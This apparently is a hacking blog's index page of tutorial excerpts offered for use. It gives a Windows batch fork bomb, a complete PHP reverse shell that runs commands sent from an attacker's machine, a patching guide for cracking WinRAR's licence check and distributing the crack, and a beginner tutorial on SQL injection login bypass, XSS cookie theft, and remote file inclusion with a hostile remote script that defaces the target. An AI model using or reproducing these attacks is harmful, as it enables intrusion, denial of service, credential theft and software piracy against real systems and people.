How to make a Fork Bomb (rabbit virus)

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software..

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing... I am not responsible if you kills your computer or somebody else computer with or without permission..

Now that we have that out a the way here we go...
Blocks of code should be set as style "Formatted" like this.

Code: .bat

:s
START %0
GOTO :s

>Run this boy from a flash drive so you can see how it works and pull the drive to stop it..

LIKE AND COMMENT..

Read more »

Back connect Shell | Reverse Shell in PHP

Back Connect Shell also known as Reverse Shell is a Piece of Code which is used to Host a Shell on the Server or the Victim, But instead of sitting there and listening for connections (As in the Case of Bind Shell) it rather Connects Back to the Attacker Machine.

In this tutorial i’ll be making a Back Connect Shell in PHP-

Code-
back-connect.php
>Code: php

<?php
/*********************
@@author : Kumaran
@@facebook : facebook.com/hackersgrp
@@Email : mail4hackersgrp@gmail.com
********************/
ini_set ( 'max_execution_time' , 0 ) ;
?>
<html>
<head>
<title>Back Connect Shell -- PHP</title>
</head>
<body>
<h1>Welcome to Back Connect Control Panel </h1>
<p> Fill in the form Below to Start the Back Connect Service </p>
<?php
if ( isset ( $_GET [ 'port' ] ) &&
isset ( $_GET [ 'ip' ] ) &&
$_GET [ 'port' ] != "" &&
$_GET [ 'ip' ] != ""
)
{
echo "<p>The Program is now trying to connect!</p>" ;
$ip = $_GET [ 'ip' ] ;
$port = $_GET [ 'port' ] ;
$sockfd = fsockopen ( $ip , $port , $errno , $errstr ) ;
if ( $errno != 0 )
{
echo "<font color='red'><b>$errno</b> : $errstr</font>" ;
}
else if ( ! $sockfd )
{
$result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>" ;
}
else
{
fputs ( $sockfd ,
" \n ================================================================= \n
Back Connect in PHP \n
Coded by kumaran \n
@@author : kumaran
@@facebook : facebook.com/hackersgrp
@@Email : mail4hackersgrp@gmail.com
\n =================================================================" ) ;
$pwd = shell_exec ( "pwd" ) ;
$sysinfo = shell_exec ( "uname -a" ) ;
$id = shell_exec ( "id" ) ;
$dateAndTime = shell_exec ( "time /t & date /T" ) ;
$len = 1337 ;
fputs ( $sockfd , $sysinfo . " \n " ) ;
fputs ( $sockfd , $pwd . " \n " ) ;
fputs ( $sockfd , $id . " \n \n " ) ;
fputs ( $sockfd , $dateAndTime . " \n \n " ) ;
while ( ! feof ( $sockfd ) )
{
$cmdPrompt = "(Shell)[$]>" ;
fputs ( $sockfd , $cmdPrompt ) ;
$command = fgets ( $sockfd , $len ) ;
fputs ( $sockfd , " \n " . shell_exec ( $command ) . " \n \n " ) ;
}
fclose ( $sockfd ) ;
}
}
else
{
?>
<table align= "center" >
<form method= "GET" >
<td>
<table style= "border-spacing: 6px;" >
<tr>
<td>Port</td>
<td>
<input style= "width: 200px;" name= "port" value= "31337" />
</td>
</tr>
<tr>
<td>IP </td>
<td><input style= "width: 100px;" name= "ip" size= '5' value= "127.0.0.1" />
</tr>
<tr>
<td>
<input style= "width: 90px;" class = "own" type= "submit" value= "Connect back:D!" />
</td>
</tr>

</table>
</td>
</form>
</tr>
</table>
<p align= "center" style= "color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
}
?>

Its as easy as a couple of clicks to make it work and to use..!

Dont forget to Like and comment..

Read more »

Step-by-Step Guide to Crack WinRAR

I will be writing about the challenge I got at FB, where I cracked WinRAR 3.80 using a disassembler and will tell you the same here. You can crack any version of WinRAR using this method and need not to pay for the registration fee and you can do this all by your self, easily. Furthermore, major software are cracked using the same way, but just get a bit complex in the methodology. This tutorial is intended for those who are new to cracking and disassembling.

*This tutorial is intended for educational purposes only*

>The Tools-

To perform this hack you will be needing -

1. Any De-assembler (I use Hackers Disassembler and Hview )
2. Resource Hacker
3. A patch Creator ( Use Universal Patch Creator or Code fusion)

You will be able to get them by Google..

How to Crack ?

You need to have a bit knowledge of assembly language,and in case you don’t have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.
I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .


Now copy the WinRAR.exe file to desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address

Now load Hackers Disasembler and load the copy in it.

The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter…

After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn’t checks for the condition.

In the above code you can see this code -

00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12

This is the code responsible for validating you as a legal user . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71.
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.


Now in the dialog box that opens,search for “please” and you will get the reference as -
ID-REMINDER, “Please purchase WinRAR license”

Double click on it and you will reach the subsequent code.

The code will be something like

* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB

Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.

 Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.

Step 2 – Fixing and Patching

Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.


After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and you will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.


After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -
Type .444B71 in place of 00444B71


and search in the code.

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes –


After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -



Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats…You have cracked WinRAR Replace the original WinRAR.exe with this copy of winrar.exe by renaming it. It will work 100% fine

Step 3 – Spicing up the EXE

Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.



Launch Resource Hacker, load the copy of winrar.exe in it



Now go to DIALOG –> Expand tree –> ABOUT RARDLG and click it. Now Find Trial copy line and replace it with your favorite one



and click on Compile Script button.


Now save the file with any name on your desktop or any location what so ever.




Now you have a fully patched WinRAR.exe file ) you can either use it, or also can distribute it like a real cracker. If you want to learn that, move on to next step.

Step 4 – Creating a working Patch (or giving Professional touch )

I will be using diablo2oo2′s Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.

Launch Patch Creator and click on add new project. Enter project Information and click on save.


Click on Add – > Offset patch



After you have done that, double click on offset patch and then

1. Give path of original winrar.exe
2. Give path of unmodified Winrar.exe (again)
3. Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)
4. Click on compare and it will show difference between both files
5. Click on save.

Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL


Congrats you have created a patch of your own and have learned to crack WinRAR


You can crack other software in the same way… just practice, debug and disassemble and you will get the way

Read more »

Basic Website Hacking Tutorial for beginners

Note: I believe you have some basic knowledge of HTML and PHP :)
Intended for educational purpose only...


SQL Injection

SQL injection is the act of injection your own, custom-crafted SQL commands into a

web-script so that you can manipulate the database any way you want. Some example usages of

SQL injection: Bypass login verification, add new admin account, lift passwords, lift

credit-card details, etc.; you can access anything that’s in the database.

Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code
PHP Code:

php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
echo(“<form method=post>

“);
} else {
$sql = “SELECT `IP` FROM `users` WHERE `username`=’$user’ AND `password`=’$pass’”;
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != “”) {
echo(“Welcome, $user.”);
} else {
echo(“Incorrect login details.”);
}
}
?>

Basically what this code does, is take the username and password input, and takes the

users’s IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw an “‘” into the inputs, and see if it outputs an error; if so, it’s probably

injectable. If it doesn’t display anything, it might be injectable, and if it is, you will

be dealing with blind SQL injection which anyone can tell you is no fun. Else, it’s not

injectable.

The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into his account. Since

the code doesn’t filter our input, we can insert anything we want into the statement, and

just let ourselves in. To do this, we would simply put “Administrator” in the username box,

and “‘ OR 1=1–” into the password box; the resulting SQL query to be run against the

database would be “SELECT `IP` FROM `users` WHERE `username`=’Administrator’ AND

`password=” OR 1=1–’”. Because of the “OR 1=1″, it will have the ability to ignore the

password requirement, because as we all know, the logic of “OR” only requires one question

to result in true for it to succeed, and since 1 always equals 1, it works; the “–” is the

‘comment out’ character for SQL which means it ignores everything after it, otherwise the

last “‘” would ruin the syntax, and just cause the query to fail.

XSS (Cross-Site Scripting)
This vulnerability allows for an attacker’s input to be sent to unsuspecting victims. The

primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie,

they can log into whatever site they stole your cookie from under your account (usually,

and assuming you were logged in at the time.)

Example Vulnerable Code – search.php (PHP)
PHP Code:

php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo(“You searched for $s. There were no results found”);
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as “<font

color=red>XSS</font>”. If the site is vulnerable to XSS, you will see something like this:

XSS, else, it’s not vulnerable.

Example Exploit Code (Redirect)
Because we’re mean, we want to redirect the victim to goatse (don’t look that up if you

don’t know what it is) by tricking them into clicking on a link pointed to

“search.php?search=// “. This will output “You searched for // . There were no results

found” (HTML) and assuming the target’s browser supports JS (JavaScript) which all modern

browsers do unless the setting is turned off, it will redirect them to abc.

RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed

and executed on the local server.

Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include(“home.php”);
}
?>

Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it is vulnerable to

RFI and consequently LFI. If you don’t it’s not vulnerable to RFI, but still may be

vulnerable to LFI. Assuming the server is running *nix, try viewing

“index.php?p=/etc/passwd”; if you see the passwd file, it’s vulnerable to LFI; else, it’s

not vulnerable to RFI or LFI.

Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our

server
PHP Code:
<?php
unlink(“index.php”);
system(“echo Hacked > index.php”);
?>
and then we view “index.php?p=http://our.site.com/malicious.php” then our malicious code

will be run on their server, and by doing so, their site will simply say ‘Hacked’ now.

Read more »

Warning: Internet to face global outage on July 9

A virus that entered, infected and took control of computers across the world might cause their users to lose access to the internet in July.. As i Earlier warned about this to all..

A group of hackers across the world took control of infected computers an online advertising scam..

Around 350,000 PC users have machines infected with an invisible, undetectable 'Trojan' computer virus sending users to unintended and illegal sites. After July 9, infected users won't be able to connect to the internet.

Look for previous posts to know the defense method or Click Here

Read more »